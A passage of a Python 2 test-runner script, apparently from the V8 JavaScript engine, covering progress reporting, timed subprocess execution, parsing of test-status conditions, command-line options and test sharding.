if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class BreakNowException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def TestsIsolates(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self, self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def GetCustomFlags(self, mode):
return None
def Run(self):
self.BeforeRun()
result = None
try:
result = self.RunCommand(self.GetCommand())
except:
self.terminate = True
raise BreakNowException("User pressed CTRL+C or IO went wrong")
finally:
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
popen_args = subprocess.list2cmdline(args)
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = Win32SetErrorMode(error_mode)
Win32SetErrorMode(error_mode | prev_error_mode)
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
# On Windows, when run with -jN in parallel processes,
# OS often fails to unlink the temp file. Not sure why.
# Need to retry.
# Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch
retry_count = 0
while retry_count < 30:
try:
os.unlink(name)
return
except OSError, e:
retry_count += 1
time.sleep(retry_count * 0.1)
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[],
['--stress-opt', '--always-opt'],
['--nocrankshaft']]
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
def VariantFlags(self):
return VARIANT_FLAGS
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def DownloadData(self, context):
config = self.GetConfiguration(context)
if 'DownloadData' in dir(config):
config.DownloadData()
def AddTestsToList(self, result, current_path, path, context, mode):
config = self.GetConfiguration(context)
for v in config.VariantFlags():
tests = config.ListTests(current_path, path, mode, v)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def DownloadData(self, path, context):
(name, rest) = CarCdr(path)
for test in self.tests:
if not name or name.match(test.GetName()):
test.DownloadData(context)
def ListTests(self, current_path, path, context, mode, variant_flags):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--nobreak-on-abort', '--nodead-code-elimination',
'--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : ['--nobreak-on-abort', '--nodead-code-elimination']}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
name = self.vm_root + SUFFIX[mode]
if utils.IsWindows() and not name.endswith('.exe'):
name = name + '.exe'
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
flags = testcase.GetCustomFlags(mode)
if flags is None:
flags = FLAGS[mode]
return testcase.variant_flags + flags
def GetTimeout(self, testcase, mode):
result = self.timeout * TIMEOUT_SCALEFACTOR[mode]
if '--stress-opt' in self.GetVmFlags(testcase, mode):
return result * 4
else:
return result
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
result = 0
try:
result = progress.Run(tasks)
except Exception, e:
print "\n", e
return result
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
def Evaluate(self, env, defs):
return env[self.name]
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
elif self.op == '!=':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
elif self.Current(2) == '!=':
self.AddToken('!=')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==', '!=']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
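# Illustrative example: the status-file condition
#   PASS || FAIL if $mode == debug
# tokenizes to ['PASS', '||', 'FAIL', 'if', '$', 'mode', '==', 'debug'], and
# ParseCondition() returns an Operation tree whose GetOutcomes() contains both
# 'pass' and 'fail' when env = {'mode': 'debug'}, and only 'pass' otherwise.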
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
def TestsIsolates(self):
return self.case.TestsIsolates()
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
TIMEOUT_DEFAULT = 60;
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=False, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--build-system", help="Build system in use (scons or gyp)",
default='scons')
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("--download-data", help="Download missing test suite data",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=-1, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2", default="mips32r2");
result.add_option("--shell", help="Path to V8 shell", default="d8")
result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--stress-only",
help="Only run tests with --always-opt --stress-opt",
default=False, action="store_true")
result.add_option("--nostress",
help="Don't run crankshaft --always-opt --stress-op test",
default=False, action="store_true")
result.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
result.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
result.add_option("--noprof", help="Disable profiling support",
default=False)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
# Simulators are slow, therefore allow a longer default timeout.
if options.timeout == -1:
if options.arch in ['android', 'arm', 'mipsel']:
options.timeout = 2 * TIMEOUT_DEFAULT;
else:
options.timeout = TIMEOUT_DEFAULT;
if options.snapshot:
options.scons_flags.append("snapshot=on")
global VARIANT_FLAGS
if options.mips_arch_variant:
options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant)
if options.stress_only:
VARIANT_FLAGS = [['--stress-opt', '--always-opt']]
if options.nostress:
VARIANT_FLAGS = [[],['--nocrankshaft']]
if options.shell.endswith("d8"):
if options.special_command:
options.special_command += " --test"
else:
options.special_command = "@ --test"
if options.noprof:
options.scons_flags.append("prof=off")
options.scons_flags.append("profilingsupport=off")
if options.build_system == 'gyp':
if options.build_only:
print "--build-only not supported for gyp, please build manually."
options.build_only = False
return True
def DoSkip(case):
return (SKIP in case.outcomes) or (SLOW in case.outcomes)
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(timeout)4d tests are expected to timeout sometimes
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not DoSkip(c)]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
import shlex
prefix = shlex.split(urllib.unquote(value[:pos]))
suffix = shlex.split(urllib.unquote(value[pos+1:]))
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def ShardTests(tests, options):
if options.shard_count < 2:
return tests
if options.shard_run < 1 or options.shard_run > options.shard_count:
print "shard-run not a valid number, should be in [1:shard-count]"
print "defaulting back to running all tests"
return tests
count = 0
shard = []
for test in tests:
if count % options.shard_count == options.shard_run - 1:
shard.append(test)
count += 1
return shard
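# Illustrative example: with --shard-count=3 and --shard-run=2, ShardTests()
# keeps the tests at 0-based positions 1, 4, 7, ..., i.e. every third test
# starting from the second one.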
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.build_system == 'gyp':
SUFFIX['debug'] = ''
shell = abspath(options.shell)
buildspace = dirname(shell)
context = Context(workspace, buildspace, VERBOSE,
shell,
options.timeout,
GetSpecialCommandProcessor(options.special_command),
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# Download missing test suite data if requested.
if options.download_data:
for path in paths:
root.DownloadData(path, context)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator,
'isolates': options.isolates
}
test_list = root.ListTests([], path, context, mode, [])
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += ShardTests(cases, options)
